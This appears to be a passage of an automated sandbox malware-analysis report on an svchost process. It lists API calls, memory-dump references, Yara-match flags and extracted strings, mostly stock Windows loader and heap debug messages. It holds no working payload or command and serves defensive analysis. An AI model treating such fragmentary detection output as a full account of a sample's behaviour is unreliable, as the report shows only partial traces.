                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 253 3072c70-3072c7c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 02673E3A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 02673E3A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 02673E3A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 02673E3A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 228 268c753-268c794 call 2664853 call 268d653 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,0267E36B,?,?,00000000,?,0267E36B,?,?,?), ref: 0268C78F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 233 268c7a3-268c7e4 call 2664853 call 268d653 RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,E8560001,00000007,00000000,00000004,00000000,02676E0D,000000F4), ref: 0268C7DF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 243 268c7f3-268c82c call 2664853 call 268d653 ExitProcess
                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,434B7343,?,?,434B7343), ref: 0268C827
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 248 3072c0a-3072c0f 249 3072c11-3072c18 248->249 250 3072c1f-3072c26 LdrInitializeThunk 248->250
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2160512332
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-3089669407
                                                                                                                      Strings
                                                                                                                      • corrupted critical section, xrefs: 030A54C2
                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A54CE
                                                                                                                      • double initialized or corrupted critical section, xrefs: 030A5508
                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A540A, 030A5496, 030A5519
                                                                                                                      • Critical section address, xrefs: 030A5425, 030A54BC, 030A5534
                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 030A5543
                                                                                                                      • Thread identifier, xrefs: 030A553A
                                                                                                                      • 8, xrefs: 030A52E3
                                                                                                                      • Critical section address., xrefs: 030A5502
                                                                                                                      • Invalid debug info address of this critical section, xrefs: 030A54B6
                                                                                                                      • Critical section debug info address, xrefs: 030A541F, 030A552E
                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A54E2
                                                                                                                      • Address of the debug info found in the active list., xrefs: 030A54AE, 030A54FA
                                                                                                                      • undeleted critical section in freed memory, xrefs: 030A542B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                      • API String ID: 0-2368682639
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                      • API String ID: 0-360209818
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                      • API String ID: 0-3591852110
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                      • API String ID: 0-3197712848
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                      • API String ID: 0-3532704233
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                      • API String ID: 0-1357697941
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                      • API String ID: 0-3063724069
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                      • API String ID: 0-1700792311
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 0302D2AF
                                                                                                                      • @, xrefs: 0302D313
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0302D2C3
                                                                                                                      • @, xrefs: 0302D0FD
                                                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0302D146
                                                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0302D0CF
                                                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0302D262
                                                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0302D196
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                      • API String ID: 0-1356375266
                                                                                                                      Strings
                                                                                                                      • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 030976EE
                                                                                                                      • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03097709
                                                                                                                      • Internal error check failed, xrefs: 03097718, 030978A9
                                                                                                                      • sxsisol_SearchActCtxForDllName, xrefs: 030976DD
                                                                                                                      • minkernel\ntdll\sxsisol.cpp, xrefs: 03097713, 030978A4
                                                                                                                      • @, xrefs: 03049EE7
                                                                                                                      • Status != STATUS_NOT_FOUND, xrefs: 0309789A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                      Strings
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 030A2180
                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 030A2160, 030A219A, 030A21BA
                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 030A219F
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 030A2178
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 030A21BF
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 030A2165
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                      Strings
                                                                                                                      • LdrpInitializeProcess, xrefs: 0306C6C4
                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 030A8170
                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 030A8177, 030A81EB
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0306C6C3
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 030A8181, 030A81F5
                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 030A81E5
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                      Strings
                                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 0305527B
                                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 03055247
                                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 0305542B
                                                                                                                      • WindowsExcludedProcs, xrefs: 0305522A
                                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 03055352
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1975516107
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                      • API String ID: 0-3061284088
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3570731704
                                                                                                                      Strings
                                                                                                                      • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03097D03
                                                                                                                      • SsHd, xrefs: 0304A885
                                                                                                                      • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03097D56
                                                                                                                      • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03097D39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                      • API String ID: 0-2905229100
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                      • API String ID: 0-379654539
                                                                                                                      Strings
                                                                                                                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 030955AE
                                                                                                                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 030954ED
                                                                                                                      • HEAP[%wZ]: , xrefs: 030954D1, 03095592
                                                                                                                      • HEAP: , xrefs: 030954E0, 030955A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                      • API String ID: 0-1657114761
                                                                                                                      Strings
                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 030A21D9, 030A22B1
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 030A22B6
                                                                                                                      • .Local, xrefs: 030628D8
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 030A21DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                      • API String ID: 0-1239276146
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #HY$2Nd$gfff$gfff
                                                                                                                      • API String ID: 0-3836139364
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                      • API String ID: 0-2586055223
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                      • API String ID: 0-336120773
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                      • API String ID: 0-1391187441
                                                                                                                      Strings
                                                                                                                      • HEAP[%wZ]: , xrefs: 03043255
                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0304327D
                                                                                                                      • HEAP: , xrefs: 03043264
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
